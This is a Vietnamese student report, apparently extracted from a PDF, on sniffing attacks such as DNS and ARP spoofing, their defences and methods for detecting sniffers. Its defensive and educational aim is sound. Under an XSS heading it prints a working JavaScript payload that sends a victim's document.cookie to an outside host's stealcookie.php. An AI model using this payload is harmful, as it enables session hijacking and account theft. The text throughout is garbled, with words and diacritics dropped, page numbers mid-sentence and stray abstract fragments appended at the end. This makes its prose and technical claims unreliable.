bị, mục đích để định tuyến lại lưu lượng qua host sử dụng để cơng mình, từ chặn yêu cầu DNS gửi gói liệu giả mạo để lừa nạn nhân truy cập vào website giả mạo kẻ công dựng nên thay vào thẳng website thức mà họ cố gắng truy cập 2.7.3 Các biện pháp phòng chống DNS Spoofing Tấn cơng DNS Spoofing khó để phịng chống có dấu hiệu cơng Nạn nhân khơng thể nhận bị chuyển hướng truy cập vào trang giả mạo thấy có bất thường tiến hành đăng nhập Hoặc kẻ công léo, nạn nhân nhận có điều khác thường lúc giao diện trang web Một số hướng phịng chống cơng DNS Spoofing: Bảo mật hệ thống máy tính bạn: Các dạng cơng thường xuất phát từ nội Nếu làm công tác bảo mật tốt từ yếu tố môi trường thật, yếu tố người việc bị lợi dụng để chuyển hướng DNS điều bất khả thi Tránh sử dụng DNS cho hệ thống bảo mật: Điều đồng nghĩa, mơi trường có chứa liệu nhạy cảm cơng ty, việc hạn chế sử dụng Internet, cấm truy cập mạng máy tính điều cần thiết Sử dụng IDS: Một dạng hệ thống phát dấu hiệu xâm nhập Khi đặt triển khai hệ thống ta, phát hình thức giả mạo ARP cache giả mạo DNS Sử dụng DNSSEC: DNSSEC giải pháp thay cho DNS, sử dụng ghi DNS có chữ ký (Signature) để bảo đảm hợp lệ hóa đáp trả truy vấn Giải pháp có triển khai định Cách phịng chống Phương pháp cơng Cách thức chủ yếu dùng phần mềm phát hoạt động chương trình nghe mạng AntiSniff, PromiScan, Promqry and PromqryUI, ARPwatch, Ettercap, v.v… Riêng với Ettercap (ettercap), chương 22 trình vừa dùng để nghe trộm, vừa có khả phát nghe trộm nhờ hỗ trợ plugin arp_cop (phát trạng thái ARP posioning);find_ettercap (phát trình ettercap khác chạy);scan_poisoner (phát máy thực posioning); seach_promisc (phát máy nghe trộm chế độ “hỗn tạp”),… – Dùng chương trình giám sát hoạt động mạng Thiết lập hệ thống phát xâm nhập IDS (Intrution Detection System) trình miễn phí Snort (Snort :: Home Page) nhằm phát tượng lạ mạng, có ARP spoofing, để có biện pháp đối phó thích hợp Nhìn chung, sử dụng phần mềm phát nghe trộm giải pháp nhanh thuận tiện người dùng cuối Tuy nhiên hạn chế lớn chương trình phát sau bị nghe – phát bị động nghe trộm xảy Vì đa phần chương trình chống dựa vào việc phát tình trạng Promiscuous (hỗn độn) ARP spoofing để cảnh báo tình trạng bị nghe trộm Dưới số giải pháp phòng chống – nên sử dụng kết hợp – Giới hạn mức độ phạm vi broadcast cách phân chia VLAN (Virtual Local Area Network); – Giới hạn khả bị cài đặt chương trình nghe cách áp dụng sách quản lý cài đặt phần mềm cho hệ thống Áp tính port security để hạn chế thiết bị mạng kết nối trái phép – Đối với mạng nhỏ, nên sử dụng địa IP tĩnh bảng ARP tĩnh để hạn chế khả bị công kiểu ARP spoofing thông qua giám sát chặt chẽ thay đổi địa MAC (Media Access Control) thiết bị switch – Áp dụng chế one-time password – thay đổi password liên tục – Mã hóa liệu truyền dẫn chế truyền thơng liệu an tồn SSL (Secure Sockets Layer), mạng riêng ảo VNP (Virtual Private Network) Nói cách khác thay hạn chế sử dụng giao thức truyền thơng khơng mã hóa liệu giao thức mã hóa Ví dụ: Dùng SSH (Secure Shell Host) thay cho Telnet/Rlogin; dùng SFTP (secure FTP) thay FTP; dùng Trillian (Trillian – IM, Astra, Windows Live, Facebook, Twitter, Yahoo, MySpace, AIM, Email, and more!) hay Jabber (http://jabber.org) làm chương trình chat; dùng HTTPS thay cho HTTP v.v… 23 ============================================= Để ngăn chăn kẻ công muốn Sniffer Password Bạn đồng thời sử dụng giao thức, phương pháp để mã hoá password sử dụng giải pháp chứng thực an toàn (Authentication): – SMB/CIFS: Trong mơi trường Windows/SAMBA bạn cần kích hoạt tính LANmanager Authencation – Keberos: Một giải pháp chứng thực liệu an toàn sử dụng Unix Windows: ftp://aeneas.mit.edu/pub/kerberos/doc/KERBEROS.FAQ – Stanford SRP (Secure Remote Password): Khắc phục nhược điểm khơng mã hố Password truyền thong giao thức FTP Telnet Unix:http://srp.stanford.edu/srp/ Mã hóa đường truyền a SSL (Secure Socket Layer) Một giao thức mã hoá phát triển cho hầu hết Webserver, Web Browser thông dụng SSL sử dụng để mã hố thơng tin nhạy cảm để gửi qua đường truyền : Số thẻ tin dụng khách hàng, password thông tin quan trọng.http://www.openssl.org/ http://www.modssl.org/ b PGP S/MIME E-mail có khả bị kẻ công ác ý Sniffer Khi Sniffer E-mail khơng mã hố, chúng khơng biết nội dung mail, mà chúng biết thơng tin địa người gửi, địa người nhận…Chính để đảm bảo an tồn tính riêng tư cho E-mail bạn cần phải mã hố chúng…S/MIME tích hợp hầu hết chương trình gửi nhận Mail Netscape Messenger, Outlock Express…PGP giao thức sủ dụng để mã hoá E- mail Nó có khả hỗ trợ mã hố DSA, RSA lên đến 2048 bit liệu http://www.gnupg.org/ c OpenSSH Khi bạn sử dụng Telnet, FTP…2 giao thức chuẩn khơng cung cấp khả mã hố liệu đường truyền Đặc biệt nguy hiểm không mã 24 hoá Password, chúng gửi Password qua đường truyền dạng Clear Text Điều xảy liệu nhạy cảm bị Sniffer OpenSSH giao thức đời để khắc phục nhược điểm này: ssh (sử dụng thay Telnet), sftp (sử dụng thay FTP)… http://www.openssh.org/ d VPNs (Virtual Private Network) Được sử dụng để mã hoá liệu truyền thong Internet Tuy nhiên Hacker công thoả hiệp Node của kết nối VPN đó, chúng tiến hành Sniffer Một ví dụ đơn giản,là người dung Internet lướt Web sơ ý để nhiễm RAT (Remoto Access Trojan), thường loại Trojan thường có chứa sẵn Plugin Sniffer Cho đến người dùng bất cẩn thiết lập kết nối VPN Lúc Plugin Sniffer Trojan hoạt động có khả đọc liệu chưa mã hố trước đưa vào VPN Để phịng chống công kiểu này: bạn cần nâng cao ý thức cảnh giác cho người sử dụng hệ thống mạng VPN bạn, đồng thời sử dụng chương trình quét Virus để phát ngăn chặn không để hệ thống bị nhiễm Trojan Static ARP Table Rất nhiều điều xấu xảy có thành cơng thuốc độc bảng ARP máy tính mạng bạn làm để ngăn chặn cố gắng để đầu độc bảng ARP Một cách để ngăn chặn tác động xấu hành vi để tạo mục bảng ARP tĩnh cho tất thiết bị đoạn mạng địa phương bạn Khi điều thực hiện, hạt nhân bỏ qua tất câu trả lời ARP cho địa IP cụ thể sử dụng mục nhập sử dụng địa MAC định thay - Lỗ hổng XSS var a = new Image(); var a1 = “https://pentestethical.000webhost.com/ ”; var a2 = “ stealcookie.php?c=”; var a3 = document.cookie; a.src = a1 + a2 +a3 ; 25 IDS, IPS − IDS: phát xâm nhập − IPS: phát ngăn chặn xâm nhập Được chia làm loại chính: − HIDS (và IPS): triển khai máy trạm server quan trọng, để bảo vệ riêng máy − NIDS: đặt điểm quan trọng hệ thống mạng, để phát xâm nhập cho khu vực Cơng việc IDS/IPS: Nếu hoạt động theo kiểu nhận dạng mẫu packet so trùng packet với mẫu công mà có, trùng ==> loại packet công ==> cảnh báo ngăn cản Hiện đa số IDS/IPS hoạt động theo kiểu Tuy nhiên kiểu cơng IDS khơng nhận biết được, nên phải cập nhật lỗi thường xuyên giống cập nhật virus Nếu hoạt động theo kiểu heuristic thông minh (khơng biết dịch cho phải) IDS theo dõi mạng xem có tượng bất thường hay khơng, phản ứng lại Lợi điểm nhận biết kiểu công mới, nhiều trường hợp bị báo động nhầm (không phải trường hợp công mà gây báo động) Phương pháp ping Hầu hết chương trình Sniffer cài đặt máy tính mạng sử dụng TCP/IP Stack Bởi bạn gửi yêu cầu đến máy tính này, chúng phản hồi lại cho bạn kết Bạn gửi yêu cầu phản hồi tới địa IP máy tính mạng (máy mà bạn cần kiểm tra xem có bị cài đặt Sniffer hay không), không thông qua Adapter Ethernet Phương pháp Arp Phương pháp phát Sniffer tương tự phương pháp dùng Ping Khác biệt chỗ sử dụng Packet ARP Bạn tim thấy hướng dẫn chi tiết cụ thể với chương trình kèm hỗ trợ việc phát Sniffer theo phương pháp :http://www.apostols.org/projectz/neped / Đơn giản bạn cần gửi Packet ARP đến địa mạng (khơng phải Broadcast) Nếu máy tính trả lời lại Packet ARP 26 địa Thì máy tính cài đặt Sniffer chế độ hỗn tạp(Promiscuous Mode) Mỗi Packet ARP chứa đầy đủ thông tin người gửi người nhận Khi Hacker gửi Packet ARP đến địa loan truyền tin (Broadcast Address), bao gồm thông tin địa IP bạn địa MAC phân giải Ethernet Ít phút sau máy tính hệ thống mạng Ethernet nhớ thông tin Bởi Hacker gửi Packet ARP khơng qua Broadcast Address Tiếp ping đến Broadcast Address Lúc máy tính trả lời lại mà khơng ARPing, chụp thơng tin địa MAC máy tính cách sử dụng Sniffer để chụp khung ARP (ARP Frame) Phương pháp sử dụng DNS Rất nhiều chương trình Sniffer có tính phân giải ngược địa IP thành DNS mà chúng nhìn thấy (như dsniff) Bởi quan sát lưu lượng truyền thông DNS bạn phát Sniffer chế độ hỗn tạp(Promiscuous Mode) Để thực phương pháp này, bạn cần theo dõi trình phân giải ngược DNS Server bạn Khi bạn phát hành động Ping liên tục với mục đích thăm dị đến địa IP không tồn hệ thống mạng bạn Tiếp hành động cố gắng phân giải ngược địa IP biết từ Packet ARP Khơng khác hành động chương trình Sniffer Phương pháp Source Route Phương pháp sử dụng thông tin địa nguồn địa đích Header IP để phát hành động Sniff đoạn mạng Tiến hành ping từ máy tính đến máy tính khác Nhưng tính Routing máy tính nguồn phải vơ hiệu hố Hiểu đơn giản làm để gói tin khơng thể đến đích Nếu bạn thấy trả lời, đơn giản hệ thống mạng bạn bị cài đặt Sniffer Để sử dụng phương pháp bạn cần sử dụng vào vài tuỳ chọn Header IP Để Router bỏ qua địa IP đến tiếp tục chuyển tiếp đến địa IP tuỳ chọn Source- Route Router 27 Lấy ví dụ cụ thể : Bob Anna nằm đoạn mạng Khi có người khác đoạn mạng gửi cho cô ta vài Packet IP nói chuyển chúng đến cho Bob Anna Router, cho lên cô ta Drop tất Packet IP mà người muốn chuyển tới Bob (bởi cô ta làm việc này) Một Packet IP không gửi đến Bob, mà trả lời lại Điều vô lý, sử dụng chương trình Sniffer 10 Phương pháp giăng bẫy (decoy) Tương tự phương pháp sử dụng ARP sử dụng phạm vi mạng rộng lớn (gần khắp nơi) Rất nhiều giao thức sử dụng Password khơng mã hố đường truyền, Hacker coi trọng Password này, phương pháp giăng bẫy thoả mãn điều Đơn giản bạn cần giả lập Client sử dụng Service mà Password khơng mã hố : POP, FTP, Telnet, IMAP…Bạn cấu hình User khơng có quyền hạn, hay chí User khơng tồn tại.Khi Sniff thơng tin coi «q giá» Hacker tìm cách kiểm tra, sử dụng khai thác chúng…Bạn làm gí ??? Để biết thêm thông tin phương pháp thú vị bạn tham khảo trang thơng tin:http://www.zurich.ibm.com/~dac/Prog_…html/index.htm 11 Phương pháp kiểm tra châm trễ gói tin (Latency) Phương pháp làm giảm thiểu lưu thông hệ thống mạng bạn Bằng cách gửi lượng thơng tin lớn đến máy tính mà bạn nghi bị cài đặt Sniffer Sẽ khơng có hiệu ứng gí đáng kể máy tính hồn tồn khơng có Bạn ping đến máy tính mà bạn nghi ngờ bị cài đặt Sniffer trước thời gian chịu tải thời gian chị tải Để quan sát khác thời điểm Tuy nhiên phương pháp tỏ không hiệu Bản thân Packet IP gửi đường truyền gây trậm trễ thất lạc Cũng Sniffer chạy chế độ “User Mode” xử lý độc lập CPU cho kết khơng xác Do mà tài liệu có tính chất giới thiệu Sniffer, nên không đề cập đến cách thức để sử dụng Sniffer hệ thống mạng Tuy nhiên nêu qua hệ thống mạng bị Sniffer: Mã: – Cable Modem 28 – DSL – ADSL – Switched Network – Wireless like IEEE 802.11 a.k.a AirPort (hệ thống mạng không dây) Những giao thức mà thơng tin Password khơng mã hố, nguy hiểm bị Sniffer: Mã: – Telnet, Rlogin – SNMP – NNTP – POP, IMAP, SMTP – FTP CHƯƠNG 3: DEMO MỘT SỐ PHƯƠNG PHÁP TẤN CÔNG SNIFFING 3.1 Mơ hình minh họa TÀI LIỆU THAM KHẢO [1] Lê Đình Thích, Hồng Sỹ Tương, An tồn mạng máy tính, Học viện kỹ thuật mật mã, 2013 [2] Đặng Trường Sơn, Các kiểu công mạng, Đại học Ngoại ngữ tin học TPHCM, 2010 [3] Ngô Xuân Giang, Kỹ thuật cơng phịng thủ khơng gian mạng, Viện nghiên cứu an ninh mạng, 2012 [4] Lê Bảo Long, Tìm hiểu an ninh mạng kỹ thuật Sniffer, Cao đẳng CNTT hữu nghị Việt Hàn, 2012 [5] Nguyễn Hiếu Minh, Tấn cơng mạng máy tính, Học viện kỹ thuật quân 29 ... pháp công mạng cách phòng chống điều tất yếu Bài báo cáo “NGHIÊN CỨU CÁC PHƯƠNG PHÁP TẤN CÔNG SNIFFER? ?? thực nhằm tìm hiểu kiểu cơng phổ biến mạng Cụ thể, báo cáo sâu vào nghiên cứu phương pháp công. .. cách phịng chống Mục tiêu đề là: Tìm hiểu số kiểu công phổ biến mạng Tìm hiểu phương pháp cơng sniffing Cách phịng chống cơng sniffing CHƯƠNG 2: PHƯƠNG PHÁP TẤN CƠNG SNIFFING VÀ CÁCH PHỊNG... tâm VNCERT ghi nhận 6.303 công mạng vào hệ thống thông tin Việt Nam, bao gồm 1.522 công lừa đảo, 3.792 công cài đặt phần mềm độc hại 989 công thay đổi giao diện Tổng số công mạng vào hệ thống thông